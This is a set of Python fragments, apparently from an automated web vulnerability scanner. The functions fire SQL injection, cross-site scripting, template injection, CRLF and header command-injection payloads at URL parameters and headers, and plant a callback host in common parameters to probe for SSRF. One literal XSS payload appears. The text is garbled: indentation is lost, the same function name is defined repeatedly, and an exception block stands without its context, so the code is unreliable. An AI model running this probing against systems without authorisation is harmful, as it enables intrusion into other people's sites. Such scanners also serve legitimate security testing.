def Put(url):
for param in url.split('?')[1].split('&'):
for payload in sqli_payloads:
if post_data(urlparse(url).query) == 0:
break
r = nq.Put(url, post_data(urlparse(url).query))
if r == 0:
break
save_request.save(r)
data = urlparse(url.replace(param, param + payload)).query
req = nq.Put(url.split('?')[0], post_data(data))
if req == 0:
break
for n, e in sql_err.items():
r = findall(e.encode('utf-8'), save_request.get().content)
r2 = findall(e.encode('utf-8'), req.content)
if len(r) < len(r2):
bug = {
'name': 'SQL injection',
'payload': payload,
'method': 'PUT',
'parameter': param,
'target': url.split('?')[0],
'data': data
}
show.bug(bug='SQL injection',
payload=payload,
method='PUT',
parameter=param,
target=url.split('?')[0],
link=data)
return bug
return None
def Post(url):
for param in url.split('?')[1].split('&'):
for payload in sqli_payloads:
d = post_data(urlparse(url).query)
if d == 0:
break
r = nq.Post(url, post_data(urlparse(url).query))
if r == 0:
break
save_request.save(r)
data = urlparse(url.replace(param, param + payload)).query
req = nq.Post(url.split('?')[0], post_data(data))
if req == 0:
break
for n, e in sql_err.items():
r = findall(e.encode('utf-8'), save_request.get().content)
r2 = findall(e.encode('utf-8'), req.content)
if len(r) < len(r2):
show.bug(bug='SQL injection',
payload=payload,
method='POST',
parameter=param,
target=url.split('?')[0],
link=data)
break
def Put(url):
mt = methods.Put(url.split('?')[0], urlparse(url).query)
if mt == 0:
pass
elif mt == 1 and refxss.Put(url) == 1:
for param in url.split('?')[1].split('&'):
for payload in xss_payloads:
data = urlparse(url.replace(param, param + payload)).query
d = post_data(data)
if d == 0:
break
req = nq.Put(url.split('?')[0], post_data(data))
if req == 0:
break
if payload.encode('utf-8') in req.content:
bug = {
'name': 'Corss-site scripting',
'payload': payload,
'method': 'PUT',
'parameter': param,
'target': url.split('?')[0],
'data': data
}
show.bug(bug='Cross-site scripting',
payload=payload,
method='PUT',
parameter=param,
target=url.split('?')[0],
link=data)
return bug
return None
def Put(url):
if methods.Put(url) == 1:
for param in url.split('?')[1].split('&'):
for payload, message in ssti_payloads.items():
if post_data(urlparse(url).query) == 0:
break
r = nq.Put(
url.split('?')[0], post_data(urlparse(url).query))
if r == 0:
break
r = len(findall(message.encode('utf-8'), r.content))
data = urlparse(url.replace(param, param + payload)).query
req = nq.Put(url.split('?')[0], post_data(data))
if req == 0:
break
if r < len(findall(message.encode('utf-8'), req.content)):
bug = {
'name': 'template injection',
'payload': payload,
'method': 'PUT',
'parameter': param,
'target': url.split('?')[0],
'data': data
}
show.bug(bug='template injection',
payload=payload,
method='PUT',
parameter=param,
target=url.split('?')[0],
link=data)
return bug
return None
def Put(url,data=None):
try:
if nq.Put(url.split('?')[0],post_data(urlparse(url).query)).status_code != 405:
return 1
else:
return 0
except:
return 0
def Put(url):
for param in url.split('?')[1].split('&'):
for payload in xss_payloads:
data = urlparse(url.replace(param, param + payload)).query
d = post_data(data)
if d == 0:
break
req = nq.Put(url.split('?')[0], post_data(data))
if req == 0:
break
if payload.encode('utf-8') in req.content:
show.bug(bug='Cross-site scripting',
payload=payload,
method='PUT',
parameter=param,
target=url.split('?')[0],
link=data)
break
def Put(url):
try:
for param in url.split('?')[1].split('&'):
url = url.replace(param, f'{param}scantrrr')
r = nq.Put(url.split('?')[0],post_data(url))
if r.content.decode().lower().find('scantrrr') != -1:
return 1
else:
return 0
except:
return 0
def NEON_CVE(url):
urls = add_path(url)
for u in urls:
r = nq.Post(u, post_data('q=<img src=x onerror=alert(1)>'))
if '<img src=x onerror=alert(1)>'.encode('utf-8') in r.content:
show.bug(bug='Cross-site scripting',
payload='<img src=x onerror=alert(1)>',
method='GET',
parameter='q',
target=u,
link='q=<img src=x onerror=alert(1)>')
def inject(host):
for param in host.split('?')[1].split('&'):
done = 0
for payload in payloads:
r = nq.Get(host.replace(param,param + payload))
if r != 0:
for header,value in r.headers.items():
if header == 'Header-Test':
if value == 'BLATRUC':
print(f'[{green}CRLF{rest}] Found :> {host.replace(param,param + payload)}')
done = 1
if done == 1:
break
for param in host.split('?')[1].split('&'):
done = 0
for payload in payloads:
data = urlparse(host.replace(param,param + payload)).query
d = post_data(data)
r = nq.Post(host.split('?')[0],d)
if r != 0:
for header,value in r.headers.items():
if header == 'Header-Test':
if value == 'BLATRUC':
print(f'[{green}CRLF{rest}] Found :> {host}\n{info} Method :> POST\n{info} Data :> {data}')
done = 1
if done == 1:
break
for param in host.split('?')[1].split('&'):
done = 0
for payload in payloads:
data = urlparse(host.replace(param,param + payload)).query
d = post_data(data)
r = nq.Put(host.split('?')[0],d)
if r != 0:
for header,value in r.headers.items():
if header == 'Header-Test':
if value == 'BLATRUC':
print(f'[{green}CRLF{rest}] Found :> {host}\n{info} Method :> PUT\n{info} Data :> {data}')
done = 1
if done == 1:
break
def Post(url):
try:
for param in url.split('?')[1].split('&'):
url = url.replace(param, f'{param}scantrrr')
r = nq.Post(url.split('?')[0],post_data(url))
for header,value in r.headers.items():
if 'scantrrr' in header or 'scantrrr' in value:
return 1
else:
return 0
except:
return 0
def Post(url):
for param in url.split('?')[1].split('&'):
for payload, message in ssti_payloads.items():
if post_data(urlparse(url).query) == 0:
break
r = nq.Post(url.split('?')[0], post_data(urlparse(url).query))
if r == 0:
break
r = len(findall(message.encode('utf-8'), r.content))
data = urlparse(url.replace(param, param + payload)).query
req = nq.Post(url.split('?')[0], post_data(data))
if req == 0:
break
if r < len(findall(message.encode('utf-8'), req.content)):
show.bug(bug='template injection',
payload=payload,
method='POST',
parameter=param,
target=url.split('?')[0],
link=data)
break
def Put(url):
d = nq.Dump()
for header in SCAN_Headers:
for payload in sqli_payloads:
all_headers = {}
try:
url.split('?')[1].split('&')
data = urlparse(url).query
data = post_data(data)
if data == 0:
data = {}
except:
data = {}
r = nq.Put(url, data)
if r == 0:
break
save_request.save(r)
try:
H = nq.Dump()['headers'][header]
P = f'{H}{payload}'
except:
P = payload
for H, V in d['headers'].items():
if H == header:
pass
else:
all_headers[H] = V
all_headers[header] = P
req = REQ(url.split('?')[0],
data=data,
method='PUT',
headers=all_headers)
if req == 0:
break
for n, e in sql_err.items():
r = findall(e.encode('utf-8'), save_request.get().content)
r2 = findall(e.encode('utf-8'), req.content)
if len(r) < len(r2):
show.bug_Header(bug='SQL injection',
payload=payload,
method='PUT',
header=header,
target=url)
break
def Put(url):
d = nq.Dump()
for header in SCAN_Headers:
for payload, message in rce_payloads.items():
all_headers = {}
payload = payload.replace('\n', '%0a')
try:
url.split('?')[1].split('&')
data = urlparse(url).query
data = post_data(data)
if data == 0:
data = {}
except:
data = {}
r = nq.Put(url.split('?')[0], data)
if r == 0:
break
r = len(findall(message.encode('utf-8'), r.content))
try:
H = nq.Dump()['headers'][header]
P = f'{H}{payload}'
except:
P = payload
for H, V in d['headers'].items():
if H == header:
pass
else:
all_headers[H] = V
all_headers[header] = P
req = REQ(url.split('?')[0],
data=data,
method='PUT',
headers=all_headers)
if req == 0:
break
if r < len(findall(message.encode('utf-8'), req.content)):
show.bug_Header(bug='command injection',
payload=payload.replace('\n', '%0a'),
method='PUT',
header=header,
target=url)
break
def new_req(method='GET',
Dump=None,
proxy=None,
url=None,
redirect=False,
data=None,
timeout=10,
headers={},
cookies=None):
method = method.upper()
if data:
data = post_data(data)
if method == 'GET':
r = get(url=url,
proxies=proxy,
cookies=cookies,
allow_redirects=redirect,
timeout=timeout,
verify=False,
headers=headers)
if method == 'POST':
r = post(url=url,
data=data,
proxies=proxy,
allow_redirects=redirect,
verify=False,
timeout=timeout,
cookies=cookies,
headers=headers)
if method == 'PUT':
r = put(url=url,
data=data,
proxies=proxy,
allow_redirects=redirect,
verify=False,
cookies=cookies,
timeout=timeout,
headers=headers)
if Dump:
d_r = dump.dump_all(r)
print(d_r.decode())
return r
def GO(url, host):
l = len(ssrf_parameters)
newurl = url
for par in ssrf_parameters:
pay = f'{host}/{par}'
if newurl != url:
if len(urlparse(newurl).query) > 0:
newurl += f'&{par}={pay}'
else:
newurl += f'?{par}={pay}'
else:
if len(urlparse(url).query) > 0:
newurl += f'&{par}={pay}'
else:
newurl += f'?{par}={pay}'
if len(urlparse(newurl).query.split(
'=')) == parameters_in_one_request + 1:
nq.Get(newurl)
nq.Post(url.split('?')[0], post_data(urlparse(newurl).query))
newurl = url
def Put(url):
d = nq.Dump()
for header in SCAN_Headers:
for payload in xss_payloads:
all_headers = {}
try:
url.split('?')[1].split('&')
data = urlparse(url).query
data = post_data(data)
if data == 0:
data = {}
except:
data = {}
try:
H = nq.Dump()['headers'][header]
P = f'{H}{payload}'
except:
P = payload
for H, V in d['headers'].items():
if H == header:
pass
else:
all_headers[H] = V
all_headers[header] = P
req = REQ(url.split('?')[0],
data=data,
method='PUT',
headers=all_headers)
if req == 0:
break
if payload.encode('utf-8') in req.content:
show.bug_Header(bug='Cross-site scripting',
payload=payload,
method='PUT',
header=header,
target=url)
break
except Exception as e:
print(e)
sys.exit()
else:
Header = {}
if opts.Random:
Random = True
else:
Random = False
if opts.proxy:
proxy = opts.proxy
proxy = {'http': proxy, 'https': proxy}
else:
proxy = None
if opts.cookie:
cookie = post_data(opts.cookie)
if cookie == 0:
print('\n{bad} invalid data'.format(bad=bad))
sys.exit()
else:
cookie = None
if opts.redirect:
redirect = True
else:
redirect = False
if opts.List:
List = opts.List
try:
List = open(List, 'r')
except Exception as e:
print(e)
def GO(url, host):
for par in ssrf_parameters:
nq.Get(f"{url.split('?')[0]}/?{par}={host}/{par}")
nq.Post(url.split('?')[0], post_data(f'{par}={host}/{par}'))
nq.Put(url.split('?')[0], post_data(f'{par}={host}/{par}'))
